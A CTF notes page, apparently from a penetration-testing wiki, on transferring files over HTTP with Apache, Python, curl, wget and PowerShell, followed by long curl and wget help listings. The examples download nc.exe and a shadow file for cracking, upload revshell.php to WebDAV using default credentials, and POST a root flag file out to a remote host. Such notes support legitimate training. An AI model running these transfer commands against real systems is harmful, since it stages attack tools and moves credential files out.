> For the complete documentation index, see [llms.txt](https://cajac.gitbook.io/ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cajac.gitbook.io/ctf-notes/lat-mov/lateral-tool-transfer/transfers-via-http-s.md).

# Transfers via HTTP(S)

## Share files via HTTP

### Share files via Apache2

To start file sharing via Apache2 and the default wev root directory `/var/www/html`&#x20;

```bash
sudo systemctl start apache2
```

When done, stop the service with

```bash
sudo systemctl stop apache2
```

### Share files via Python

File sharing via the *Python 3 http.server module*

```bash
python -m http.server [<port>]
```

The default port is port 8000.

When done, terminate the service with `CTRL + C`

## Download files via HTTP

### Retrieve files with curl

As a default, the file is printed to `stdout`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ curl https://www.sunet.se
<!DOCTYPE html><html lang="sv"><head><style>@charset "UTF-8";
/* rem fallback to pixels */
/*!
 * Bootstrap v4.0.0-beta (https://getbootstrap.com)
 * Copyright 2011-2017 The Bootstrap Authors
 * Copyright 2011-2017 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 */
<---snip--->
```

To save the file, use the `-o` parameter

```bash
┌──(kali㉿kali)-[~]
└─$ curl https://www.sunet.se -o sunet.html                                                                                                                  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  953k  100  953k    0     0  1768k      0 --:--:-- --:--:-- --:--:-- 1768k

```

Grepping on the output should preferably be done with the `-s` parameter (silent mode) to skip the banner printing

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Logon]
└─$ curl -s -L --cookie admin=True http://jupiter.challenges.picoctf.org:13594/flag | grep -oE 'picoCTF{.*}'
picoCTF{<REDACTED>}
```

### Retrieve files with PowerShell

#### From cmd.exe

```powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.48.3/nc.exe', 'nc.exe')
```

#### From PowerShell

With WebClient.DownloadFile

```powershell
(New-Object System.Net.WebClient).DownloadFile('http://192.168.48.3/nc.exe', 'nc.exe')
```

With Invoke-WebRequest

```powershell
Invoke-WebRequest -URI http://192.168.48.3/nc.exe -OutFile nc.exe
```

### Retrieve files with wget

As a default the retrieved file keeps it's name

```bash
wget http://192.168.50.154:8000/shadow
```

This can be changed with the `-O` parameter&#x20;

```bash
wget http://192.168.50.154:8000/shadow -O toCrack.txt
```

## Upload files via HTTP

### Upload with curl

To upload files with `curl` use the `-T` parameter

```bash
curl -u wampp:xampp -T revshell.php http://10.10.13.109/webdav/
```

### Upload with wget

To upload (POST) files with `wget` use the `--post-file` parameter

```bash
wget --post-file=/root/root_flag.txt http://10.14.61.233:12345
```

## Usage information

### Curl usage information

<details>

<summary>curl -h</summary>

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ curl -h                                                                                                                        
Usage: curl [options...] <url>
 -d, --data <data>           HTTP POST data
 -f, --fail                  Fail fast with no output on HTTP errors
 -h, --help <category>       Get help for commands
 -i, --include               Include response headers in output
 -o, --output <file>         Write to file instead of stdout
 -O, --remote-name           Write output to file named as remote file
 -s, --silent                Silent mode
 -T, --upload-file <file>    Transfer local FILE to destination
 -u, --user <user:password>  Server user and password
 -A, --user-agent <name>     Send User-Agent <name> to server
 -v, --verbose               Make the operation more talkative
 -V, --version               Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".
```

</details>

<details>

<summary>curl --help all</summary>

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ curl --help all
Usage: curl [options...] <url>
     --abstract-unix-socket <path>   Connect via abstract Unix domain socket
     --alt-svc <filename>            Enable alt-svc with this cache file
     --anyauth                       Pick any authentication method
 -a, --append                        Append to target file when uploading
     --aws-sigv4 <provider1[:prvdr2[:reg[:srv]]]>  AWS V4 signature auth
     --basic                         HTTP Basic Authentication
     --ca-native                     Load CA certs from the OS
     --cacert <file>                 CA certificate to verify peer against
     --capath <dir>                  CA directory to verify peer against
 -E, --cert <certificate[:password]>  Client certificate file and password
     --cert-status                   Verify server cert status OCSP-staple
     --cert-type <type>              Certificate type (DER/PEM/ENG/P12)
     --ciphers <list of ciphers>     SSL ciphers to use
     --compressed                    Request compressed response
     --compressed-ssh                Enable SSH compression
 -K, --config <file>                 Read config from a file
     --connect-timeout <seconds>     Maximum time allowed to connect
     --connect-to <HOST1:PORT1:HOST2:PORT2>  Connect to host
 -C, --continue-at <offset>          Resumed transfer offset
 -b, --cookie <data|filename>        Send cookies from string/load from file
 -c, --cookie-jar <filename>         Save cookies to <filename> after operation
     --create-dirs                   Create necessary local directory hierarchy
     --create-file-mode <mode>       File mode for created files
     --crlf                          Convert LF to CRLF in upload
     --crlfile <file>                Certificate Revocation list
     --curves <list>                 (EC) TLS key exchange algorithms to request
 -d, --data <data>                   HTTP POST data
     --data-ascii <data>             HTTP POST ASCII data
     --data-binary <data>            HTTP POST binary data
     --data-raw <data>               HTTP POST data, '@' allowed
     --data-urlencode <data>         HTTP POST data URL encoded
     --delegation <LEVEL>            GSS-API delegation permission
     --digest                        HTTP Digest Authentication
 -q, --disable                       Disable .curlrc
     --disable-eprt                  Inhibit using EPRT or LPRT
     --disable-epsv                  Inhibit using EPSV
     --disallow-username-in-url      Disallow username in URL
     --dns-interface <interface>     Interface to use for DNS requests
     --dns-ipv4-addr <address>       IPv4 address to use for DNS requests
     --dns-ipv6-addr <address>       IPv6 address to use for DNS requests
     --dns-servers <addresses>       DNS server addrs to use
     --doh-cert-status               Verify DoH server cert status OCSP-staple
     --doh-insecure                  Allow insecure DoH server connections
     --doh-url <URL>                 Resolve hostnames over DoH
 -D, --dump-header <filename>        Write the received headers to <filename>
     --egd-file <file>               EGD socket path for random data
     --engine <name>                 Crypto engine to use
     --etag-compare <file>           Load ETag from file
     --etag-save <file>              Parse incoming ETag and save to a file
     --expect100-timeout <seconds>   How long to wait for 100-continue
 -f, --fail                          Fail fast with no output on HTTP errors
     --fail-early                    Fail on first transfer error
     --fail-with-body                Fail on HTTP errors but save the body
     --false-start                   Enable TLS False Start
 -F, --form <name=content>           Specify multipart MIME data
     --form-escape                   Escape form fields using backslash
     --form-string <name=string>     Specify multipart MIME data
     --ftp-account <data>            Account data string
     --ftp-alternative-to-user <command>  String to replace USER [name]
     --ftp-create-dirs               Create the remote dirs if not present
     --ftp-method <method>           Control CWD usage
     --ftp-pasv                      Send PASV/EPSV instead of PORT
 -P, --ftp-port <address>            Send PORT instead of PASV
     --ftp-pret                      Send PRET before PASV
     --ftp-skip-pasv-ip              Skip the IP address for PASV
     --ftp-ssl-ccc                   Send CCC after authenticating
     --ftp-ssl-ccc-mode <active/passive>  Set CCC mode
     --ftp-ssl-control               Require TLS for login, clear for transfer
 -G, --get                           Put the post data in the URL and use GET
 -g, --globoff                       Disable URL globbing with {} and []
     --happy-eyeballs-timeout-ms <ms>  Time for IPv6 before IPv4
     --haproxy-clientip <ip>         Set address in HAProxy PROXY
     --haproxy-protocol              Send HAProxy PROXY protocol v1 header
 -I, --head                          Show document info only
 -H, --header <header/@file>         Pass custom header(s) to server
 -h, --help <category>               Get help for commands
     --hostpubmd5 <md5>              Acceptable MD5 hash of host public key
     --hostpubsha256 <sha256>        Acceptable SHA256 hash of host public key
     --hsts <filename>               Enable HSTS with this cache file
     --http0.9                       Allow HTTP 0.9 responses
 -0, --http1.0                       Use HTTP 1.0
     --http1.1                       Use HTTP 1.1
     --http2                         Use HTTP/2
     --http2-prior-knowledge         Use HTTP 2 without HTTP/1.1 Upgrade
     --http3                         Use HTTP v3
     --http3-only                    Use HTTP v3 only
     --ignore-content-length         Ignore the size of the remote resource
 -i, --include                       Include response headers in output
 -k, --insecure                      Allow insecure server connections
     --interface <name>              Use network INTERFACE (or address)
     --ipfs-gateway <URL>            Gateway for IPFS
 -4, --ipv4                          Resolve names to IPv4 addresses
 -6, --ipv6                          Resolve names to IPv6 addresses
     --json <data>                   HTTP POST JSON
 -j, --junk-session-cookies          Ignore session cookies read from file
     --keepalive-time <seconds>      Interval time for keepalive probes
     --key <key>                     Private key filename
     --key-type <type>               Private key file type (DER/PEM/ENG)
     --krb <level>                   Enable Kerberos with security <level>
     --libcurl <file>                Generate libcurl code for this command line
     --limit-rate <speed>            Limit transfer speed to RATE
 -l, --list-only                     List only mode
     --local-port <range>            Use a local port number within RANGE
 -L, --location                      Follow redirects
     --location-trusted            Like --location, but send auth to other hosts
     --login-options <options>       Server login options
     --mail-auth <address>           Originator address of the original email
     --mail-from <address>           Mail from this address
     --mail-rcpt <address>           Mail to this address
     --mail-rcpt-allowfails          Allow RCPT TO command to fail
 -M, --manual                        Display the full manual
     --max-filesize <bytes>          Maximum file size to download
     --max-redirs <num>              Maximum number of redirects allowed
 -m, --max-time <seconds>            Maximum time allowed for transfer
     --metalink                      Process given URLs as metalink XML file
     --negotiate                     Use HTTP Negotiate (SPNEGO) authentication
 -n, --netrc                         Must read .netrc for username and password
     --netrc-file <filename>         Specify FILE for netrc
     --netrc-optional                Use either .netrc or URL
 -:, --next                        Make next URL use its separate set of options
     --no-alpn                       Disable the ALPN TLS extension
 -N, --no-buffer                     Disable buffering of the output stream
     --no-clobber                    Do not overwrite files that already exist
     --no-keepalive                  Disable TCP keepalive on the connection
     --no-npn                        Disable the NPN TLS extension
     --no-progress-meter             Do not show the progress meter
     --no-sessionid                  Disable SSL session-ID reusing
     --noproxy <no-proxy-list>       List of hosts which do not use proxy
     --ntlm                          HTTP NTLM authentication
     --ntlm-wb                       HTTP NTLM authentication with winbind
     --oauth2-bearer <token>         OAuth 2 Bearer Token
 -o, --output <file>                 Write to file instead of stdout
     --output-dir <dir>              Directory to save files in
 -Z, --parallel                      Perform transfers in parallel
     --parallel-immediate         Do not wait for multiplexing (with --parallel)
     --parallel-max <num>            Maximum concurrency for parallel transfers
     --pass <phrase>                 Pass phrase for the private key
     --path-as-is                    Do not squash .. sequences in URL path
     --pinnedpubkey <hashes>       FILE/HASHES Public key to verify peer against
     --post301                       Do not switch to GET after a 301 redirect
     --post302                       Do not switch to GET after a 302 redirect
     --post303                       Do not switch to GET after a 303 redirect
     --preproxy [protocol://]host[:port]  Use this proxy first
 -#, --progress-bar                  Display transfer progress as a bar
     --proto <protocols>             Enable/disable PROTOCOLS
     --proto-default <protocol>      Use PROTOCOL for any URL missing a scheme
     --proto-redir <protocols>       Enable/disable PROTOCOLS on redirect
 -x, --proxy [protocol://]host[:port]  Use this proxy
     --proxy-anyauth                 Pick any proxy authentication method
     --proxy-basic                   Use Basic authentication on the proxy
     --proxy-ca-native               Load CA certs from the OS to verify proxy
     --proxy-cacert <file>           CA certificates to verify proxy against
     --proxy-capath <dir>            CA directory to verify proxy against
     --proxy-cert <cert[:passwd]>    Set client certificate for proxy
     --proxy-cert-type <type>        Client certificate type for HTTPS proxy
     --proxy-ciphers <list>          SSL ciphers to use for proxy
     --proxy-crlfile <file>          Set a CRL list for proxy
     --proxy-digest                  Digest auth with the proxy
     --proxy-header <header/@file>   Pass custom header(s) to proxy
     --proxy-http2                   Use HTTP/2 with HTTPS proxy
     --proxy-insecure                Skip HTTPS proxy cert verification
     --proxy-key <key>               Private key for HTTPS proxy
     --proxy-key-type <type>         Private key file type for proxy
     --proxy-negotiate               HTTP Negotiate (SPNEGO) auth with the proxy
     --proxy-ntlm                    NTLM authentication with the proxy
     --proxy-pass <phrase>       Pass phrase for the private key for HTTPS proxy
     --proxy-pinnedpubkey <hashes>   FILE/HASHES public key to verify proxy with
     --proxy-service-name <name>     SPNEGO proxy service name
     --proxy-ssl-allow-beast     Allow security flaw for interop for HTTPS proxy
     --proxy-ssl-auto-client-cert    Auto client certificate for proxy
     --proxy-tls13-ciphers <ciphersuite list>  TLS 1.3 proxy cipher suites
     --proxy-tlsauthtype <type>      TLS authentication type for HTTPS proxy
     --proxy-tlspassword <string>    TLS password for HTTPS proxy
     --proxy-tlsuser <name>          TLS username for HTTPS proxy
     --proxy-tlsv1                   TLSv1 for HTTPS proxy
 -U, --proxy-user <user:password>    Proxy user and password
     --proxy1.0 <host[:port]>        Use HTTP/1.0 proxy on given port
 -p, --proxytunnel                   HTTP proxy tunnel (using CONNECT)
     --pubkey <key>                  SSH Public key filename
 -Q, --quote <command>               Send command(s) to server before transfer
     --random-file <file>            File for reading random data from
 -r, --range <range>                 Retrieve only the bytes within RANGE
     --rate <max request rate>       Request rate for serial transfers
     --raw                           Do HTTP raw; no transfer decoding
 -e, --referer <URL>                 Referrer URL
 -J, --remote-header-name            Use the header-provided filename
 -O, --remote-name                   Write output to file named as remote file
     --remote-name-all               Use the remote filename for all URLs
 -R, --remote-time                   Set remote file's time on local output
     --remove-on-error               Remove output file on errors
 -X, --request <method>              Specify request method to use
     --request-target <path>         Specify the target for this request
     --resolve <[+]host:port:addr[,addr]...>  Resolve host+port to address
     --retry <num>                   Retry request if transient problems occur
     --retry-all-errors              Retry all errors (with --retry)
     --retry-connrefused             Retry on connection refused (with --retry)
     --retry-delay <seconds>         Wait time between retries
     --retry-max-time <seconds>      Retry only within this period
     --sasl-authzid <identity>       Identity for SASL PLAIN authentication
     --sasl-ir                       Initial response in SASL authentication
     --service-name <name>           SPNEGO service name
 -S, --show-error                    Show error even when -s is used
 -s, --silent                        Silent mode
     --socks4 <host[:port]>          SOCKS4 proxy on given host + port
     --socks4a <host[:port]>         SOCKS4a proxy on given host + port
     --socks5 <host[:port]>          SOCKS5 proxy on given host + port
     --socks5-basic                  Username/password auth for SOCKS5 proxies
     --socks5-gssapi                 Enable GSS-API auth for SOCKS5 proxies
     --socks5-gssapi-nec             Compatibility with NEC SOCKS5 server
     --socks5-gssapi-service <name>  SOCKS5 proxy service name for GSS-API
     --socks5-hostname <host[:port]>  SOCKS5 proxy, pass hostname to proxy
 -Y, --speed-limit <speed>           Stop transfers slower than this
 -y, --speed-time <seconds>          Trigger 'speed-limit' abort after this time
     --ssl                           Try enabling TLS
     --ssl-allow-beast               Allow security flaw to improve interop
     --ssl-auto-client-cert          Use auto client certificate (Schannel)
     --ssl-no-revoke                 Disable cert revocation checks (Schannel)
     --ssl-reqd                      Require SSL/TLS
     --ssl-revoke-best-effort        Ignore missing cert CRL dist points
 -2, --sslv2                         SSLv2
 -3, --sslv3                         SSLv3
     --stderr <file>                 Where to redirect stderr
     --styled-output                 Enable styled output for HTTP headers
     --suppress-connect-headers      Suppress proxy CONNECT response headers
     --tcp-fastopen                  Use TCP Fast Open
     --tcp-nodelay                   Set TCP_NODELAY
 -t, --telnet-option <opt=val>       Set telnet option
     --tftp-blksize <value>          Set TFTP BLKSIZE option
     --tftp-no-options               Do not send any TFTP options
 -z, --time-cond <time>              Transfer based on a time condition
     --tls-max <VERSION>             Maximum allowed TLS version
     --tls13-ciphers <list>          TLS 1.3 cipher suites to use
     --tlsauthtype <type>            TLS authentication type
     --tlspassword <string>          TLS password
     --tlsuser <name>                TLS username
 -1, --tlsv1                         TLSv1.0 or greater
     --tlsv1.0                       TLSv1.0 or greater
     --tlsv1.1                       TLSv1.1 or greater
     --tlsv1.2                       TLSv1.2 or greater
     --tlsv1.3                       TLSv1.3 or greater
     --tr-encoding                   Request compressed transfer encoding
     --trace <file>                  Write a debug trace to FILE
     --trace-ascii <file>            Like --trace, but without hex output
     --trace-config <string>         Details to log in trace/verbose output
     --trace-ids                     Transfer + connection ids in verbose output
     --trace-time                    Add time stamps to trace/verbose output
     --unix-socket <path>            Connect through this Unix domain socket
 -T, --upload-file <file>            Transfer local FILE to destination
     --url <url>                     URL to work with
     --url-query <data>              Add a URL query part
 -B, --use-ascii                     Use ASCII/text transfer
 -u, --user <user:password>          Server user and password
 -A, --user-agent <name>             Send User-Agent <name> to server
     --variable <[%]name=text/@file>  Set variable
 -v, --verbose                       Make the operation more talkative
 -V, --version                       Show version number and quit
 -w, --write-out <format>            Output FORMAT after completion
     --xattr                         Store metadata in extended file attributes

```

</details>

### Wget usage information

<details>

<summary>wget -h</summary>

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ wget -h                            
GNU Wget 1.21.3, a non-interactive network retriever.
Usage: wget [OPTION]... [URL]...

Mandatory arguments to long options are mandatory for short options too.

Startup:
  -V,  --version                   display the version of Wget and exit
  -h,  --help                      print this help
  -b,  --background                go to background after startup
  -e,  --execute=COMMAND           execute a `.wgetrc'-style command

Logging and input file:
  -o,  --output-file=FILE          log messages to FILE
  -a,  --append-output=FILE        append messages to FILE
  -d,  --debug                     print lots of debugging information
  -q,  --quiet                     quiet (no output)
  -v,  --verbose                   be verbose (this is the default)
  -nv, --no-verbose                turn off verboseness, without being quiet
       --report-speed=TYPE         output bandwidth as TYPE.  TYPE can be bits
  -i,  --input-file=FILE           download URLs found in local or external FILE
  -F,  --force-html                treat input file as HTML
  -B,  --base=URL                  resolves HTML input-file links (-i -F)
                                     relative to URL
       --config=FILE               specify config file to use
       --no-config                 do not read any config file
       --rejected-log=FILE         log reasons for URL rejection to FILE

Download:
  -t,  --tries=NUMBER              set number of retries to NUMBER (0 unlimits)
       --retry-connrefused         retry even if connection is refused
       --retry-on-http-error=ERRORS    comma-separated list of HTTP errors to retry
  -O,  --output-document=FILE      write documents to FILE
  -nc, --no-clobber                skip downloads that would download to
                                     existing files (overwriting them)
       --no-netrc                  don't try to obtain credentials from .netrc
  -c,  --continue                  resume getting a partially-downloaded file
       --start-pos=OFFSET          start downloading from zero-based position OFFSET
       --progress=TYPE             select progress gauge type
       --show-progress             display the progress bar in any verbosity mode
  -N,  --timestamping              don't re-retrieve files unless newer than
                                     local
       --no-if-modified-since      don't use conditional if-modified-since get
                                     requests in timestamping mode
       --no-use-server-timestamps  don't set the local file's timestamp by
                                     the one on the server
  -S,  --server-response           print server response
       --spider                    don't download anything
  -T,  --timeout=SECONDS           set all timeout values to SECONDS
       --dns-timeout=SECS          set the DNS lookup timeout to SECS
       --connect-timeout=SECS      set the connect timeout to SECS
       --read-timeout=SECS         set the read timeout to SECS
  -w,  --wait=SECONDS              wait SECONDS between retrievals
                                     (applies if more then 1 URL is to be retrieved)
       --waitretry=SECONDS         wait 1..SECONDS between retries of a retrieval
                                     (applies if more then 1 URL is to be retrieved)
       --random-wait               wait from 0.5*WAIT...1.5*WAIT secs between retrievals
                                     (applies if more then 1 URL is to be retrieved)
       --no-proxy                  explicitly turn off proxy
  -Q,  --quota=NUMBER              set retrieval quota to NUMBER
       --bind-address=ADDRESS      bind to ADDRESS (hostname or IP) on local host
       --limit-rate=RATE           limit download rate to RATE
       --no-dns-cache              disable caching DNS lookups
       --restrict-file-names=OS    restrict chars in file names to ones OS allows
       --ignore-case               ignore case when matching files/directories
  -4,  --inet4-only                connect only to IPv4 addresses
  -6,  --inet6-only                connect only to IPv6 addresses
       --prefer-family=FAMILY      connect first to addresses of specified family,
                                     one of IPv6, IPv4, or none
       --user=USER                 set both ftp and http user to USER
       --password=PASS             set both ftp and http password to PASS
       --ask-password              prompt for passwords
       --use-askpass=COMMAND       specify credential handler for requesting 
                                     username and password.  If no COMMAND is 
                                     specified the WGET_ASKPASS or the SSH_ASKPASS 
                                     environment variable is used.
       --no-iri                    turn off IRI support
       --local-encoding=ENC        use ENC as the local encoding for IRIs
       --remote-encoding=ENC       use ENC as the default remote encoding
       --unlink                    remove file before clobber
       --xattr                     turn on storage of metadata in extended file attributes

Directories:
  -nd, --no-directories            don't create directories
  -x,  --force-directories         force creation of directories
  -nH, --no-host-directories       don't create host directories
       --protocol-directories      use protocol name in directories
  -P,  --directory-prefix=PREFIX   save files to PREFIX/..
       --cut-dirs=NUMBER           ignore NUMBER remote directory components

HTTP options:
       --http-user=USER            set http user to USER
       --http-password=PASS        set http password to PASS
       --no-cache                  disallow server-cached data
       --default-page=NAME         change the default page name (normally
                                     this is 'index.html'.)
  -E,  --adjust-extension          save HTML/CSS documents with proper extensions
       --ignore-length             ignore 'Content-Length' header field
       --header=STRING             insert STRING among the headers
       --compression=TYPE          choose compression, one of auto, gzip and none. (default: none)
       --max-redirect              maximum redirections allowed per page
       --proxy-user=USER           set USER as proxy username
       --proxy-password=PASS       set PASS as proxy password
       --referer=URL               include 'Referer: URL' header in HTTP request
       --save-headers              save the HTTP headers to file
  -U,  --user-agent=AGENT          identify as AGENT instead of Wget/VERSION
       --no-http-keep-alive        disable HTTP keep-alive (persistent connections)
       --no-cookies                don't use cookies
       --load-cookies=FILE         load cookies from FILE before session
       --save-cookies=FILE         save cookies to FILE after session
       --keep-session-cookies      load and save session (non-permanent) cookies
       --post-data=STRING          use the POST method; send STRING as the data
       --post-file=FILE            use the POST method; send contents of FILE
       --method=HTTPMethod         use method "HTTPMethod" in the request
       --body-data=STRING          send STRING as data. --method MUST be set
       --body-file=FILE            send contents of FILE. --method MUST be set
       --content-disposition       honor the Content-Disposition header when
                                     choosing local file names (EXPERIMENTAL)
       --content-on-error          output the received content on server errors
       --auth-no-challenge         send Basic HTTP authentication information
                                     without first waiting for the server's
                                     challenge

HTTPS (SSL/TLS) options:
       --secure-protocol=PR        choose secure protocol, one of auto, SSLv2,
                                     SSLv3, TLSv1, TLSv1_1, TLSv1_2, TLSv1_3 and PFS
       --https-only                only follow secure HTTPS links
       --no-check-certificate      don't validate the server's certificate
       --certificate=FILE          client certificate file
       --certificate-type=TYPE     client certificate type, PEM or DER
       --private-key=FILE          private key file
       --private-key-type=TYPE     private key type, PEM or DER
       --ca-certificate=FILE       file with the bundle of CAs
       --ca-directory=DIR          directory where hash list of CAs is stored
       --crl-file=FILE             file with bundle of CRLs
       --pinnedpubkey=FILE/HASHES  Public key (PEM/DER) file, or any number
                                   of base64 encoded sha256 hashes preceded by
                                   'sha256//' and separated by ';', to verify
                                   peer against

       --ciphers=STR           Set the priority string (GnuTLS) or cipher list string (OpenSSL) directly.
                                   Use with care. This option overrides --secure-protocol.
                                   The format and syntax of this string depend on the specific SSL/TLS engine.
HSTS options:
       --no-hsts                   disable HSTS
       --hsts-file                 path of HSTS database (will override default)

FTP options:
       --ftp-user=USER             set ftp user to USER
       --ftp-password=PASS         set ftp password to PASS
       --no-remove-listing         don't remove '.listing' files
       --no-glob                   turn off FTP file name globbing
       --no-passive-ftp            disable the "passive" transfer mode
       --preserve-permissions      preserve remote file permissions
       --retr-symlinks             when recursing, get linked-to files (not dir)

FTPS options:
       --ftps-implicit                 use implicit FTPS (default port is 990)
       --ftps-resume-ssl               resume the SSL/TLS session started in the control connection when
                                         opening a data connection
       --ftps-clear-data-connection    cipher the control channel only; all the data will be in plaintext
       --ftps-fallback-to-ftp          fall back to FTP if FTPS is not supported in the target server
WARC options:
       --warc-file=FILENAME        save request/response data to a .warc.gz file
       --warc-header=STRING        insert STRING into the warcinfo record
       --warc-max-size=NUMBER      set maximum size of WARC files to NUMBER
       --warc-cdx                  write CDX index files
       --warc-dedup=FILENAME       do not store records listed in this CDX file
       --no-warc-compression       do not compress WARC files with GZIP
       --no-warc-digests           do not calculate SHA1 digests
       --no-warc-keep-log          do not store the log file in a WARC record
       --warc-tempdir=DIRECTORY    location for temporary files created by the
                                     WARC writer

Recursive download:
  -r,  --recursive                 specify recursive download
  -l,  --level=NUMBER              maximum recursion depth (inf or 0 for infinite)
       --delete-after              delete files locally after downloading them
  -k,  --convert-links             make links in downloaded HTML or CSS point to
                                     local files
       --convert-file-only         convert the file part of the URLs only (usually known as the basename)
       --backups=N                 before writing file X, rotate up to N backup files
  -K,  --backup-converted          before converting file X, back up as X.orig
  -m,  --mirror                    shortcut for -N -r -l inf --no-remove-listing
  -p,  --page-requisites           get all images, etc. needed to display HTML page
       --strict-comments           turn on strict (SGML) handling of HTML comments

Recursive accept/reject:
  -A,  --accept=LIST               comma-separated list of accepted extensions
  -R,  --reject=LIST               comma-separated list of rejected extensions
       --accept-regex=REGEX        regex matching accepted URLs
       --reject-regex=REGEX        regex matching rejected URLs
       --regex-type=TYPE           regex type (posix|pcre)
  -D,  --domains=LIST              comma-separated list of accepted domains
       --exclude-domains=LIST      comma-separated list of rejected domains
       --follow-ftp                follow FTP links from HTML documents
       --follow-tags=LIST          comma-separated list of followed HTML tags
       --ignore-tags=LIST          comma-separated list of ignored HTML tags
  -H,  --span-hosts                go to foreign hosts when recursive
  -L,  --relative                  follow relative links only
  -I,  --include-directories=LIST  list of allowed directories
       --trust-server-names        use the name specified by the redirection
                                     URL's last component
  -X,  --exclude-directories=LIST  list of excluded directories
  -np, --no-parent                 don't ascend to the parent directory

Email bug reports, questions, discussions to <bug-wget@gnu.org>
and/or open issues at https://savannah.gnu.org/bugs/?func=additem&group=wget.
```

</details>

## Resources

**curl** - Linux man page: <https://man7.org/linux/man-pages/man1/curl.1.html>

**Invoke-WebRequest** - Mcrosoft Learn: <https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-5.1>

RFC 1945 - Hypertext Transfer Protocol -- HTTP/1.0: <https://datatracker.ietf.org/doc/html/rfc1945>

RFC 2068 - Hypertext Transfer Protocol -- HTTP/1.1: <https://datatracker.ietf.org/doc/html/rfc2068>

**wget** - Linux man page: <https://man7.org/linux/man-pages/man1/wget.1.html>
